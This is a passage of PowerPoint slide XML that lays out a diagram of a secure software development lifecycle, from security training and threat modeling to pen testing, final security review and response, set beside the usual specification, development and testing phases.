            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="214" name="Shape 214"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="1771091"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263352" y="2204864"/>
            <a:ext cx="2808311" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343471" y="2204864"/>
            <a:ext cx="0" cy="1177280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="217" name="Shape 217"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991543" y="2204864"/>
            <a:ext cx="0" cy="1177280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2019634" y="2204864"/>
            <a:ext cx="1052029" cy="1177280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="219" name="Shape 219"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7176120" y="2901223"/>
            <a:ext cx="1296143" cy="20501"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Shape 220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061157" y="1804174"/>
            <a:ext cx="1284710" cy="369332"/>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0" i="0" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Training</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Shape 221"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243912" y="2412648"/>
            <a:ext cx="1111202" cy="738664"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Kickoff &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1360830" y="2316450"/>
            <a:ext cx="720080" cy="954106"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Design Best Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Shape 223"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953341" y="2197310"/>
            <a:ext cx="902297" cy="871648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="85714"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Architecture &amp; Attack Surface Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370733" y="2857200"/>
            <a:ext cx="720080" cy="523219"/>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r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Modeling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Shape 225"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3215680" y="1947117"/>
            <a:ext cx="1420718" cy="1477328"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Use Security Development Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Best Dev and Test Practices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Shape 226"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4684353" y="1992703"/>
            <a:ext cx="1195623" cy="1200329"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Create Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Documentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>and Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>For Product</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117521" y="1966663"/>
            <a:ext cx="974694" cy="1200329"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Prepare Security Response Plan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7405135" y="2001340"/>
            <a:ext cx="974694" cy="646331"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Push</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7382836" y="2952233"/>
            <a:ext cx="974694" cy="369332"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Pen Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Shape 230"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8472264" y="2129522"/>
            <a:ext cx="728759" cy="923329"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Final Security Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10476590" y="1771091"/>
            <a:ext cx="1440160" cy="1607603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFEBEB"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10696924" y="1947948"/>
            <a:ext cx="1159716" cy="1200329"/>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lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Security Servicing &amp; Response Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10488486" y="4198455"/>
            <a:ext cx="1469814" cy="1607603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CDE6FF"/>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="234" name="Shape 234"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343471" y="4221087"/>
            <a:ext cx="0" cy="1584175"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3090814" y="4221087"/>
            <a:ext cx="0" cy="1609327"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3090811" y="4243537"/>
            <a:ext cx="6101531" cy="1552092"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879976" y="4941167"/>
            <a:ext cx="0" cy="864095"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515578" y="5112764"/>
            <a:ext cx="1008112" cy="523219"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Functional Specifications </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1343471" y="4230721"/>
            <a:ext cx="1747342" cy="1564906"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="354357" y="4379837"/>
            <a:ext cx="1008112" cy="1384995"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Feature Lists, Quality Guidelines, Architecture Docs, and Schedule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991543" y="4342457"/>
            <a:ext cx="1008112" cy="523219"/>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r>
              <a:rPr lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Design Specifications </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5976037" y="5358351"/>
            <a:ext cx="2131285" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Bug Fixes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Shape 243"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397033" y="5288492"/>
            <a:ext cx="2131285" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Development of New Codes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Shape 244"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7344897" y="4393628"/>
            <a:ext cx="2131285" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Testing and Verification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243913" y="5995664"/>
            <a:ext cx="1099557" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
